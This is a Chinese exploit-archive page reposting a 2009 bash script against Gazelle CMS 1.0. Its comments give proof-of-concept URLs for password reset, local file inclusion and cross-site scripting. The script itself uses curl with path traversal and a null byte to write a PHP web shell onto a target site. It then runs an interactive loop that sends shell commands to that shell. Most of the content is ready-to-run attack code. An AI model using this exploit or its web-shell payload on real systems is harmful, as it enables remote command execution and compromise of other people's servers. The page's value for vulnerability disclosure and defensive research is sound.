首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Gazelle CMS 1.0 Multiple Vulnerabilities / RCE Exploit
来源:https://www.ihteam.net 作者:ihteam 发布时间:2009-08-13  

#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: sheewhite@googlemail.com - https://www.ihteam.net
#       Need magic_quote_gpc Off for RCE and LFI
#       Thanks to R00T[ATI]
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"
echo "#  by white_sheep        #"
echo "#  sheewhite[at]googlemail[dot]com            #"
echo "#          #"
echo "#           https://www.ihteam.net            #"
echo "###############################################"
echo


EVILC='<?php passthru($_GET[cmd]); ?>'

echo -n "Insert url with path (ex.: http://localhost/gazelle): "
read SITE

PAGENAME=/modules/menu$RANDOM'.bak.php'

curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null

if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ]
then
 echo "[-] Not Vulnerable :( byee"
 exit
fi

while true
do
 echo -n "sh$: "
 read -r CMD
 CMD=`echo $CMD | sed 's/ /+/g'`
 echo $CMD
 curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g"
 echo
done


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Wordpad on winXP SP3 Local
·2WIRE Gateway Authentication B
·Easy Music Player 1.0.0.2 (wav
·Easy Music Player 1.0.0.2 (wav
·FTPShell Client 4.1 RC2 Name S
·Easy Music Player 1.0.0.2 (wav
·VLC Media Player 1.0.0/1.0.1 s
·Embedthis Appweb 3.0b.2-4 Remo
·pIPL 2.5.0 (.PLS /.PL) Univers
·Wordpress <= 2.8.3 Remote Admi
·EmbedThis Appweb v3.0B.2-4 Mul
·yPlay Player version 1.0 local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved